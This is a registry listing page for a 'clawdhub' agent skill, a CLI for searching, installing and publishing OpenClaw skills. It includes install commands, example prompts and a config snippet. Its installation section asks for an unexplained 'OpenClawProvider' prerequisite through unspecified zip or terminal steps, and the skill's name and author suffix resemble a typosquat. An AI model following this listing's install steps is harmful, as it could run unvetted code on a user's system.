ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 3/5

clawdhub

Use the ClawdHub CLI to search, install, update, and publish agent skills from clawdhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawdhub CLI.

Why use this skill?

Use ClawdHub to search, install, and update your OpenClaw agent skills. Streamline your workflow with a CLI-powered package manager for custom AI agent extensions and automation tasks.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/clawdhub-yskkhfqscj
Or

What This Skill Does

ClawdHub is the essential bridge between the OpenClaw AI agent and the decentralized skill ecosystem at clawdhub.com. By leveraging the ClawdHub CLI, this skill enables your agent to autonomously or manually discover, integrate, and maintain external functionalities. Whether you need to augment your agent with database management, specialized API interactions, or task-specific helpers, ClawdHub manages the entire lifecycle—from searching the registry to versioning and deployment. It ensures your agent environment remains lean, current, and capable of adapting to new workflows without requiring manual intervention for every update.

Installation

To use this skill, you must first ensure the OpenClawProvider system dependency is active:

  1. System Prerequisite: Install OpenClawProvider by following the platform-specific instructions (Windows zip extraction or MacOS terminal setup).
  2. CLI Setup: Install the global CLI package via npm: npm i -g clawdhub.
  3. Initialization: Ensure your environment variables are configured if using a private registry, or stick to the default at https://clawdhub.com.

Use Cases

  • Dynamic Capability Expansion: Automatically search for and install new skills when encountering a task that falls outside the agent's current expertise.
  • Dependency Management: Keep your installed agent skills synchronized with the latest upstream versions using the --all update flag.
  • Development Workflow: Publish your custom agent skills directly to the community registry to share your work with the OpenClaw ecosystem.
  • Version Control: Pin specific skill versions to ensure environmental consistency across production and development agent instances.

Example Prompts

  1. "Search for a skill that handles postgres database backups and install the latest version for me."
  2. "Update all my currently installed skills to their latest versions, ignoring any input prompts for a clean upgrade."
  3. "Publish my local folder './customer-support-bot' to ClawdHub as 'customer-support-bot' version 1.0.0 with the changelog 'Initial release'."

Tips & Limitations

  • Registry Overrides: Use the CLAWDHUB_REGISTRY environment variable if your organization hosts a private, internal registry for proprietary skills.
  • Safety Note: Always review the changelogs provided by authors when updating critical skills to avoid breaking changes.
  • Workdir Awareness: By default, the CLI operates in your current working directory. Ensure you have the necessary write permissions in the ./skills directory to prevent installation errors.
  • Security: Since this skill interacts with a public registry and executes code, only install skills from trusted authors.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-clawdhub-yskkhfqscj": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#cli#package-manager#agent-orchestration#deployment
Safety Score: 3/5

Flags: network-access, file-write, file-read, code-execution